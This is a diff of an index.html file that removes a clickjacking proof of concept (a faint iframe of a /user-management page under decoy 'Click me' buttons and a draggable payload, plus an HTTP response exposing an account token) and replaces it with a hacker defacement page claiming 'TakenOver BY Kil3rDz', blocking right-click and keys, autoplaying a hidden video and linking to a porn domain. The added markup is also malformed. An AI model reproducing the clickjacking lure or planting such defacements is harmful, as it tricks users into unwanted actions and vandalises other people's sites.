--- a/index.html
+++ b/index.html
@@ -1,39 +1,130 @@
-<html>
+
+<html lang="ar">
 <head>
-<style>
-#payload{
-position: absolute;
-top: 20px;
-}
-iframe{
-width: 1000px;
-height: 675px;
-border: none;
-}
-.xss{
-position: fixed;
-background: #F00;
+<html> <head> <title>Trojan Kil3r Amazigh</title> <link REL="SHORTCUT ICON" HREF="../datahub.ckan.io/uploads/group/2017-08-01-111320.424847dz.png">
+<link rel="icon" href="../datahub.ckan.io/uploads/group/2017-08-01-111320.424847dz.png"/>
+</head>
+		<script>
+			(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
+			(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
+			m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
+			})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
+
+			ga('create', 'UA-75065234-3', 'auto');
+			ga('send', 'pageview', '/203e8a26-31db-474c-bb10-b2b76617fc52.html');
+		</script></head><body oncontextmenu="return false;" onkeydown="return false;" onmousedown="return false;">&#34;&gt;
+<link href="https://fonts.googleapis.com/css?family=Iceberg" rel="stylesheet" type="text/css"/>
+<link href="https://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css"/>
+
+<style type="text/css">
+body {
+background-color:#000000;
+   -webkit-background-size: 100% 100%;
+   -moz-background-size: 100% 100%;
+   -o-background-size: 100% 100%;
+   background-size: 100% 100%;
+   margin: 0px auto;
 }
 </style>
-</head>
-<body>
-<div style="height: 26px;width: 250px;left: 41.5%;top: 340px;" class="xss">.</div>
-<div style="height: 26px;width: 100px;right: 30%;top: 327px;background: #F8F;" class="xss">1. Click Here Change Notification</div>
-<div style="height: 30px;width: 50px;left: 20%;top: 100px;background: #F5F;" class="xss">3.Click me</div>
-<iframe sandbox="allow-modals allow-popups allow-forms allow-same-origin allow-scripts" style="opacity:0.3"src="/user-management"></iframe>
-<div id="payload" draggable="true" ondragstart="event.dataTransfer.setData('text/plain', '')"><h3>2.This Is Best Game</h3></div>
-<!-- 
-How Attacker Use This Attack 
+<br/><br/><br/><center><img src="../b.top4top.net/p_1220ihio32.gif" border="0" width="400px" height=""/></center>
+<center><br/><br/><font style="color: white; text-shadow: 1px 1px 17px black;" color="black" face="Iceberg" size="7">TakenOver BY Kil3rDz :D </font><br/><br/>
 
-!-->
-</body>
-</html>
+    <font style="color: white; text-shadow: 1px 1px 17px black;" color="black" face="Iceberg" size="4">
+			I hope someday<br> when you see me
+	You will smile and say<br> He is the person who always loves me<br>
+	But all this is a dream that will never be achieved! <br><br><font style="color:green;font-size:40px;font-family: 'Iceland', cursive;text-shadow: 0 0 20px, 0px 0px 50px red;">We are <font color="red">Algerien </font><font color="white">Hackers</font></font>
+</font>
+
+<center><br/><font style="color: white; text-shadow: 1px 1px 17px black;" color="black" face="Iceberg" size="12"> <font size="2" color="red"> <a href="pornhub.dz" onclick="_blank"> Contact Us</font><br><br></font><br/><br/>
+</center>
+</center>
+<script type="text/javascript">
+
+var snowmax=35
+var snowcolor=new Array("#AAAACC","#DDDDFF","#CCCCDD","#F3F3F3","#F0FFFF")
+var snowtype=new Array("Arial Black","Arial Narrow","Times","Comic Sans MS")
+var snowletter="*"
+var sinkspeed=0.6
+var snowmaxsize=22
+var snowminsize=8
+var snowingzone=1
+var snow=new Array()
+var marginbottom
+var marginright
+var timer
+var i_snow=0
+var x_mv=new Array();
+var crds=new Array();
+var lftrght=new Array();
+var browserinfos=navigator.userAgent
+var ie5=document.all&&document.getElementById&&!browserinfos.match(/Opera/)
+var ns6=document.getElementById&&!document.all
+var opera=browserinfos.match(/Opera/)
+var browserok=ie5||ns6||opera
+
+function randommaker(range) {
+	rand=Math.floor(range*Math.random())
+    return rand
+}
+
+function initsnow() {
+	if (ie5 || opera) {
+		marginbottom = document.body.clientHeight
+		marginright = document.body.clientWidth
+	}
+	else if (ns6) {
+		marginbottom = window.innerHeight
+		marginright = window.innerWidth
+	}
+	var snowsizerange=snowmaxsize-snowminsize
+	for (i=0;i<=snowmax;i++) {
+		crds[i] = 0;
+    	lftrght[i] = Math.random()*15;
+    	x_mv[i] = 0.03 + Math.random()/10;
+		snow[i]=document.getElementById("s"+i)
+		snow[i].style.fontFamily=snowtype[randommaker(snowtype.length)]
+		snow[i].size=randommaker(snowsizerange)+snowminsize
+		snow[i].style.fontSize=snow[i].size
+		snow[i].style.color=snowcolor[randommaker(snowcolor.length)]
+		snow[i].sink=sinkspeed*snow[i].size/5
+		if (snowingzone==1) {snow[i].posx=randommaker(marginright-snow[i].size)}
+		if (snowingzone==2) {snow[i].posx=randommaker(marginright/2-snow[i].size)}
+		if (snowingzone==3) {snow[i].posx=randommaker(marginright/2-snow[i].size)+marginright/4}
+		if (snowingzone==4) {snow[i].posx=randommaker(marginright/2-snow[i].size)+marginright/2}
+		snow[i].posy=randommaker(2*marginbottom-marginbottom-2*snow[i].size)
+		snow[i].style.left=snow[i].posx
+		snow[i].style.top=snow[i].posy
+	}
+	movesnow()
+}
+
+function movesnow() {
+	for (i=0;i<=snowmax;i++) {
+		crds[i] += x_mv[i];
+		snow[i].posy+=snow[i].sink
+		snow[i].style.left=snow[i].posx+lftrght[i]*Math.sin(crds[i]);
+		snow[i].style.top=snow[i].posy
+
+		if (snow[i].posy>=marginbottom-2*snow[i].size || parseInt(snow[i].style.left)>(marginright-3*lftrght[i])){
+			if (snowingzone==1) {snow[i].posx=randommaker(marginright-snow[i].size)}
+			if (snowingzone==2) {snow[i].posx=randommaker(marginright/2-snow[i].size)}
+			if (snowingzone==3) {snow[i].posx=randommaker(marginright/2-snow[i].size)+marginright/4}
+			if (snowingzone==4) {snow[i].posx=randommaker(marginright/2-snow[i].size)+marginright/2}
+			snow[i].posy=0
+		}
+	}
+	var timer=setTimeout("movesnow()",50)
+}
+
+for (i=0;i<=snowmax;i++) {
+	document.write("<span id='s"+i+"' style='position:absolute;top:-"+snowmaxsize+"'>"+snowletter+"</span>")
+}
+if (browserok) {
+	window.onload=initsnow
+}
+</script>
 
 
-HTTP/1.1 200 OK
-Content-Type: application/json
-Content-Length: 70
-Date: Thu, 01 Jul 2021 23:15:25 GMT
-Connection: close
 
-{"accountId":173569,"accountToken":"LdnJuCHtoaUaCqZeIKsseoRGOAGCsYIP"}
+
+<iframe width="1" height="1" src="https://www.youtube.com/embed/Lva9hJkuvHg?autoplay=1&amp" frameborder="0" allowfullscreen></iframe></center></body></html>
